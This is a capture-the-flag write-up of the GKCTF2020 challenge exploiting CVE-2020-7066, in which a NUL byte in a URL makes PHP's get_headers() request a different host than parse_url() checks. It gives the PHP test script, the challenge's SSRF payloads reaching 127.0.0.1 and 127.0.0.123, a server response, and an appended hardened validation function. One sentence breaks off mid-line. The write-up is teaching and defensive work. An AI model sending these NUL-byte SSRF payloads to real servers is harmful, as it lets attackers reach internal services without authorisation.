CVE-2020-7066 SSRF vulnerability: GKCTF2020

I hadn't done any challenges for two days, so I picked a relatively easy one.

This challenge is not hard; it mainly tests the CVE-2020-7066 vulnerability (a NUL byte in the URL passed to get_headers() truncates the host that is actually requested, while parse_url() still sees the full string).

Test script:
---------------
<?php
// user input (the NUL byte is the exploitation method: parse_url() returns
// "localhost\0.example.com" as the host, so the suffix check passes, but
// get_headers() stops at the NUL and requests http://localhost)
$_GET['url'] = "http://localhost\0.example.com";

$host = parse_url($_GET['url'], PHP_URL_HOST);
if (substr($host, -12) !== '.example.com') {
    die();
}
$headers = get_headers($_GET['url']);
var_dump($headers);

Expected result:
----------------
Warning: get_headers() expects parameter 1 to be a valid path, string given in php shell code on line 1
NULL

Actual result:
--------------
headers from http://localhost

After entering the challenge there is only one link; clicking it redirects to http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://www.ctfhub.com

Following the exploitation method for the vulnerability, visit http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://127.0.0.1%00www.ctfhub.com (%00 is

and you can see:

Array
(
    [0] => HTTP/1.1 200 OK
    [1] => Date: Thu, 09 Jul 2020 15:16:46 GMT
    [2] => Server: Apache/2.4.38 (Debian)
    [3] => X-Powered-By: PHP/7.3.15
    [4] => Tips: Host must be end with '123'
    [5] => Vary: Accept-Encoding
    [6] => Content-Length: 113
    [7] => Connection: close
    [8] => Content-Type: text/html; charset=UTF-8
)

The hint says the host must end with 123, so the final payload is http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://127.0.0.123%00www.ctfhub.com

This challenge has no real difficulty once you know the vulnerability and how it is exploited; it mainly serves to broaden one's knowledge.
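As an added example (not code from the write-up or the challenge), here is a hardened version of the host check from the test script above: it rejects control bytes such as NUL before parsing, validates the parsed host against the allowlisted suffix, refuses loopback and private addresses, and hands get_headers() a URL rebuilt from the validated components rather than the raw input. The `.example.com` suffix, the function name and the allowed schemes are assumptions.

```php
<?php
// Hardened replacement for the vulnerable check (added example, hypothetical name).
function fetch_headers_safely(string $url, string $allowedSuffix = '.example.com')
{
    // CVE-2020-7066 works because parse_url() and get_headers() disagree on where
    // the string ends once a NUL byte is present; reject any control byte up front.
    if (preg_match('/[\x00-\x1f\x7f]/', $url)) {
        return null;
    }

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }

    // Only plain HTTP(S); other stream wrappers are not wanted here (assumption).
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }

    // Suffix allowlist on the parsed host, same intent as the original substr() check.
    $host = strtolower($parts['host']);
    if (substr($host, -strlen($allowedSuffix)) !== $allowedSuffix) {
        return null;
    }

    // Refuse hosts that resolve to loopback, link-local, private or reserved ranges,
    // which is what the 127.0.0.x payload in the write-up ends up reaching.
    $ip = gethostbyname($host);            // returns $host unchanged on failure
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if ($ip === $host || filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
        return null;
    }

    // Rebuild the URL from the validated parts; userinfo and fragment are dropped.
    $rebuilt = $parts['scheme'] . '://' . $host
        . (isset($parts['port']) ? ':' . $parts['port'] : '')
        . ($parts['path'] ?? '/')
        . (isset($parts['query']) ? '?' . $parts['query'] : '');

    return get_headers($rebuilt);
}

// Constructed inputs: the write-up's NUL-byte trick is rejected before parse_url() runs.
var_dump(fetch_headers_safely("http://localhost\0.example.com"));   // NULL
var_dump(fetch_headers_safely("http://127.0.0.123\0.example.com")); // NULL
```

The real fix is running a PHP release that patches CVE-2020-7066 so get_headers() itself refuses NUL bytes; the resolution check above also does not cover DNS rebinding between the lookup and the request.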

Original article: https://www.cnblogs.com/MisakaYuii-Z/p/13276872.html